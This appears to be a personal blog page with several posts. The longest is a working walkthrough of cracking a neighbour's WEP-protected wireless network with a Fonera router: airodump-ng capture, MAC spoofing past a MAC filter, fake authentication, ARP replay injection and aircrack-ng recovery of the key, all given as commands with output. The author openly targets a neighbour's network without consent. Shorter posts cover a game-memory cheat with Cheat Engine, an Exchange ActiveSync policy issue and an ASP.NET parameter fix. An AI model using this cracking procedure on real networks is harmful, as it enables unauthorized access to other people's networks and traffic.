WEP Cracking with Fon (Fonera) router

I usually use my Fon router when doing the collection work for wlan cracking. I recently moved to a new apartment in my hometown and this is what I call a target rich environment! 15 wlans with good power right at my desktop. That is just to good to be true! So here is a little run down on how to do this easily. This guide can also be used for any other hardware but it has some special info just for the fonera.

Here are a guide to cracking your fonera router:
And here is the firmware I use: http://www.dd-wrt.com/site/index

So now you have a linux computer for your pocket, much like your iPhone if you have one. The big differnece is that this linux pocket computer is great for wlan use. First start an SSH session to the router and login.

We need to setup the wlan card for our use. If your connected via the “Legend” wlan you have to keep that. I prefer to connect via cable to the router and then destroy the “Legend” network before I begin (wlanconfig ath0 destroy). But even if you destroy that you can run the rest of the guide with ath1.

So lets begin the real thing!

First create a wlan instance in monitor mode so we can listen to the world around us.

[ps]wlanconfig ath1 create wlandev wifi0 wlanmode monitor[/ps]

Then we want a list of networks around us that we can attack. With airodump-ng without any parameters we can get a list of wlans available for us.

[ps]airodump-ng ath1[/ps]

The router respondse with a list of networks and information about encryption and you can also see a list of clients that the card picks up.
In the list below no clients are seen but the usually show up, this is just a quick scan I did to show the prinicple. When you have your list just it CTRL + C to get back to the prompt.

[ps]CH 10 ][ Elapsed: 8 s ][ 2000-01-01 15:56

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:22:15:57:A6:78    1        2        0     0   1  54  WPA  CCMP   PSK  Emelie
00:1B:2F:DC:C3:4E    0        2        0     0   6  54. WPA  TKIP   PSK  M&C
00:1C:DF:04:DD:20   11        4        0    0  13  54. WPA2 CCMP   PSK  MILKYWAY
00:18:4D:8C:52:0E   15       16        0    0   3  54. WEP  WEP         MAD
00:26:5A:30:34:50   15       19        0    0   6  48. WEP  WEP         Ferdinand
00:24:8C:27:63:DC   11        5        0    0   1  54  WPA  TKIP   PSK  66b013

BSSID              STATION            PWR  Lost  Packets  Probes[/ps]

My unlucky neighbor that has chosen to call his/hers wlan for MAD will be todays target. I selected this becuase it’s MAC controlled. If the correct MAC aren’t in the routers “Allowed list” or “White list” I will be unable to connect. To be able to handle the amount of data that I need to collect to be able to crack the WEP key I need to connect a share to the FON router. In this case I will connect the FON to a share I put up on my Windows 7 box. First you need create an account on you windows box that doesn’t have spaces in it and select a password for that account. Then share a folder and give read/write access to that account. Then mount it onto your FON router.

In the /mnt folder run the command:

[ps]mkdir share[/ps]

Then mount the share to that folder like this:

[ps]mount -t cifs //<IP TO THE WINDOWS BOX>/<SHARE NAME>; -o username=<USERNAME>,password=<PASSWORD> /mnt/share[/ps]

Now we can start to collect information about the network in question. Start airodump-ng to listen to the wlan.

[ps]airodump-ng -c 3 –bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1[/ps]

So what have we done now? We provided airodump-ng with some importent information:


We told it to listen to channel 3 only. If we omit this parameter it will hop up and down the channels.

[ps]–bssid 00:18:4D:8C:52:0E[/ps]

We supplied the MAC address of the wlan base so it knows what to listen for.

[ps]-w /mnt/share/MAD[/ps]

W stands for “Write” we want airodump-ng to dump the information into the file MAD on the Windows box share.


What wlan instance to use.

The router will also show us the information in real time while it collects the IV’s (inital vectors) that we need for the crack.

[ps]CH  3 ][ Elapsed: 55 s ][ 2000-01-01 16:00

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:18:4D:8C:52:0E   19   1      475        2    0   3  48. WEP  WEP         MAD

BSSID              STATION            PWR  Lost  Packets  Probes

00:18:4D:8C:52:0E  00:22:43:6E:BD:F5   10     0        5[/ps]

Now you can see the client that is connected as well. When I started attacking this network I didn’t know it had a MAC filter running but I found out pretty quick when I couldn’t associate with it or authenticate with it. If you can’t do an association like the one below or if packet injection fails (it’s not sending any packets) you probable is talking to a MAC filtered router. So how do we solve this issue? We fake our MAC!

If you have no problem associating with the station like below you can skip this step.

[ps]aireplay-ng -1 0 -e "MAD" -a 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1
16:01:19  Waiting for beacon frame (BSSID: 00:18:4D:8C:52:0E)
16:01:19  Sending Authentication Request
16:01:19  Authentication successful
16:01:19  Sending Association Request
16:01:19  Association successful :-)[/ps]

So what did I try here? I did a “Fake Authentication” against the router to so if it allows me to connect. Please note that the -h (my client MAC is the same as the client I found earlier).
In this screen shoot I have all ready faked my MAC to be able to connect to the router. I didn’t save any screen shoot of the failure. I quick run down of the command above:


Fake Authentication attack


How often to send a Authentication/Association Request (depending on the router you will be dropped after a while and need to re-authenticate)

[ps]-e "MAD"[/ps]

The SSID of the router.

[ps]-a  00:18:4D:8C:52:0E[/ps]

The MAC address of the router.

[ps]-h  00:22:43:6E:BD:F5[/ps]

The MAC address of the client. In this case a spoofed one to get around the MAC filter but in all other cases you can use you original MAC or just 1:2:3:4:5:6


The wlan instance to use.

So this raises two questions. First how do you get your MAC?


This command will show you all the info on all the network devices you have and you can extract the MAC address of the wifi0 in this case.
Second question how do I spoof my MAC?

[ps]ifconfig wifi0 down
ifconfig wifi0 hw ether 00:22:43:6E:BD:F5
ifconfig wifi0 up

Now we have changed the MAC address of the card to what we want/need. In some cases it can give you an error like “Device Not Ready”.
Just try to destroy all the athX instances before you take the wifi0 off-line and you will probably succeed.

Now we can access the network to do our thing so let’s get to it. If you had to destroy ath1 when you reset your MAC then just create it again as we did before.
Then start the airodump-ng with the file write option again:

[ps]airodump-ng -c 3 –bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1[/ps]

Then start a second SSH client and connect to the FON and login again. Now we will help the process along big time! The data column in the scan result (first window/session) needs to go up to 250.000 for us to be able to crack a 128bit key and over 800.000 for heavier keys. You can collect all that data by just listening to the traffic but it will take days or even weeks. We can do it much quicker our selfs. In the second window/session we will start a packet injection attack of the ARP kind. In short ARP is a way for network gear to keep track of witch device have witch IP address and MAC address combination. Every time we send an ARP request the router will respond with a new IV (initial vector) and that’s what we count as data so and then use to crack the key. So let’s get the IV’s coming!

[ps]aireplay-ng -3 -b 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1[/ps]

This will start sending packets in large numbers. The FON can send about 40-50 packets per second. Thanks to the fact that we changed our MAC we will now get our traffic through. If you see the “packets sent” counter stopping that usually just that you lost you association with the router. Just hit CTRL + C and run the “Fake Authentication” attack again. If this happens over and over again set the -1 0 to something like -1 20 and it will re-associate every 20 seconds. If you need to do that just open a third window/session so you can have it all running at once.

Once we collected enough IV’s we can start cracking. I usually start the cracking process on the file before the collection is done. If you do so it will start the process and if no key is found restart the crack every 5.000 IV’s collected. How ever this is not a job for the FON due to it’s limited processing power. I usually use my linux box or my windows box where I have more computing power. The windows box is easy, there is a GUI, so if you made it this far you will be able to figure that out. The command line to do this is:

[ps]aircrack-ng c:tempfoneramad_mac-01.cap[/ps]

The result will be something like this:

[ps]Aircrack-ng 1.0

[00:00:00] Tested 717 keys (got 171180 IVs)

KB    depth   byte(vote)
0    0/  9   04(225280) 02(190208) 0D(189952) C2(188160) 5A(185088)
1    0/  1   E5(245504) 33(187648) F3(187392) FE(185344) 32(185088)
2    0/  1   9E(234496) C4(188928) 1C(188160) 3B(187648) 5D(185344)
3   26/  3   56(179200) 46(178944) A1(178944) 81(178944) 2D(178688)
4    6/  4   09(185344) 39(185088) 93(183808) E5(182528) 60(182528)

KEY FOUND! [ 04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A ]
Decrypted correctly: 100%[/ps]

As you can see I only needed little over 170.000 IV’s to do this and when the crack was successful I could stop the attack on the network.
So now we have the key:


People who get this far still ask me a question, “How do I use that key from windows?”
The routers accepts both ASCII phrases and hex keys like the one above. Just remove the : from the key and windows will be able to connect to the network.

Youtube to MP3

Have tested a lot of these programs avalible to do this. A friend of mine needed a lot of, let’s say not mainstream, music for a party. This webpage is the best tool I have tried for this!


Exchange 2007 Active sync screen lock issue with iPhone

A while ago I updated an Exchange Server 2007 with the latest service pack for a client. The SP automatically added a new Exchange ActiveSync Mailbox Policy that required the connected devices to be password protected when the screen went dark. It’s a good idea for many security reasons but the users didn’t like it at all, and the customer is always right. Changed the default policy so password wasn’t required anymore and all was good… for a while.

Then the iPhone users started complaining that there auto lock settings was restricted, they could select 1 to 5 minutes but the alternative “Never” was gone. This setting, when password isn’t configured, just turns the screen black after a few minutes of inactivity. Again I thought that would be a good thing for many reasons. The iPhone uses enough battery as is. As always if you can’t have it you need it, want it and must have it. So I reviewed the settings again. There was a setting called “Time without user input before password must be re-entered (in minutes)” that was set to 15 minutes but it was grayed out. After testing a lot of things I finally executed a powershell command to solve the issue. Then I noticed that the grayed out option had changed to 0 minutes. So I tested to just check the “Require password” check box bringing all the grayed out options back, setting the timeout to 5 minutes, unchecking the “Require password” option, again graying out the setting I just change, then apply. Then the “Never” option disappeared from the iPhone again. So MS did it again, messed up the GUI, a grayed out option shouldn’t effect anything.
Thank god for powershell so you can get down with the software properly!

Hope the pictures give you a clear picture of what I mean. If you have any questions hit me with a comment and I will try to answer your questions.

SAS Zombie Assault Cheat / Hack

Today I will give you a simple guide to cheating on flash games with the help of Cheat Engine version 5.5. The flash game of choice today is SAS 2: Zombie Assault. It doesn’t really matter what flash game we are talking about the concept is the same! I did find a way to get more money but I couldn’t find the location of the money counter to update it directly. If anyone have some input on that I would really like to hear it!

So let’s get to work! First start the game, from your favorite supplier or here: http://www.ninjakiwi.com/Games/Action/Play/SAS-Zombie-Assault-2.html

Then start Cheat Engine. If you don’t have it get it here: http://www.cheatengine.org/downloads.php

Next up is to attach cheat engine to the browser process. Cklick the computer icon in the top left corner of cheat engine to bring up the process list. Then look for your browser and attach to it. Now we need some values to search for. Start the game and look at what values you have and what you would like to change.

We have our ammo counter at the lower left corner, we have the cash. In other games you may have other things you would like to change.

Lets start with the ammo counter for the pistol (this will work for any other gun you get later in the game, even sentry guns).

1. Type in the number of bullets you have left in your gun into the “Value” field of cheat engine and the hit “First Scan”.
2. When the scan have finished you will have a bunch of results, I got almost 200000 results. We can’t change all of them hoping for the best we need to dig deeper.
3. Go back to the game and wast some more ammo.
4. Take the new ammo count and put into the “Value” field of cheat engine and hit “Next Scan”.
5. If you now have only one result you been lucky. If not, repeat step 3 and 4 until you only have one result in the list.
6. Now double click the result, it will pop up in the list at the bottom of the screen.
7. Check the box “Frozen” for the value and that gun will never run out of bullets.

You can do exactly the same with the grenades but you still have to get some first. With the sentry guns it’s the same but your not in control of the firing so wait till the gun is not shooting and then search for it’s ammo count.

Now we get to the money. As I wrote earlier I was unable to find the money variable in memory, but I didn’t put much time in to it either. There is however one way to get more money, the wave bonuses. When you complete a wave you always gets a bonus. On the higher waves it’s $500. To get more money do this:

1. Search for the number of the current wave.
2. Wait for the next wave, when the wave indicator has changed “Next Scan” for the new value.
3. Repeat 1 and 2 until you have only 2 results left.
4. Get them down in the list and freeze them.
5. Change them to a wave that gives good money but isn’t to hard with your current gear.
6. Complete the wave and get the bonus, the bonus will be repeated over and over again until you unfreeze the values.

Hope this has been help full for you all.

Must declare the scalar variable @ID

Was just burning the midnight oil on a project for a client. Working with asp.Net for the first time in ages. Making a quick fix, adding a new form for editing customer details, I used theSqlDataSource control. Usually I work with the SqlCommand in SqlDataClient directly but now I needed paging and sorting fixed quick and easy! I had a really big problem with the select command parameters. When you use them with the SqlCommand you declare them with an @ prefix in the select command like this:

[sql]Select * FROM Customers WHERE CustomersID = @ID [/sql]

(SELECT * is a sin, I know!)

Then declare the variable as: SqlCommand.Parameters.Add(new SqlParameter(“@ID”, SqlDbType.Int))
Received errors like “Must declare the scalar variable @ID” and so on. Checked, dubble checked and triple checked… The variable was defined!
But no! Some idiot at MS decided to think outside of the box and the declaration for the SqlDataSource control should be without the @!


[vbnet]<asp:SqlDataSource ID="sdsContacts" runat="server" ConnectionString="<%$ ConnectionStrings:DB_CONN %>"
SelectCommand="Select * FROM Customers WHERE CustomersID = @ID" ProviderName="System.Data.SqlClient">
<asp:Parameter Name="@ID" Direction="Input" />

But instead this:

[vbnet]<asp:SqlDataSource ID="sdsContacts" runat="server" ConnectionString="<%$ ConnectionStrings:DB_CONN %>"
SelectCommand="Select * FROM Customers WHERE CustomersID = @ID" ProviderName="System.Data.SqlClient">
<asp:Parameter Name="ID" Direction="Input" />